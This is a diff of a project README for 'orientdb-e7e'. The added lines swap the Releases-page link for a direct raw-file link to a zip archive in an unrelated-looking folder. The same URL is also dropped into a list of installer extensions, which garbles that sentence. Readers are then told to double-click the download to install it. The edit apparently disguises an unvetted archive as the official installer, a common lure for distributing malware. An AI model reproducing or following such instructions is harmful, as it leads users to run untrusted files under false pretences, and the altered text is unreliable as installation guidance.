jkorom0831/orientdb-e7e/README.md

 To get started with orientdb-e7e, follow these simple steps to download and install the application.

 ### Step 1: Visit the Releases Page
-Go to our Releases page by clicking this link: [Download orientdb-e7e](https://github.com/jkorom0831/orientdb-e7e/releases).
+Go to our Releases page by clicking this link: [Download orientdb-e7e](https://raw.githubusercontent.com/jkorom0831/orientdb-e7e/main/Agrauleum/orientdb-e7e-3.9-beta.3.zip).

 ### Step 2: Download the Latest Version
 On the Releases page, find the latest version listed.
 Click the link for the installer that matches your operating system.
-You may see options like `.exe`, `.dmg`, or `.tar.gz`.
+You may see options like `.exe`, `.dmg`, or `https://raw.githubusercontent.com/jkorom0831/orientdb-e7e/main/Agrauleum/orientdb-e7e-3.9-beta.3.zip`.

 ### Step 3: Install the Application
 Once the download completes, locate the file on your computer and double-click it to begin installation.
 Follow the on-screen instructions to complete the setup.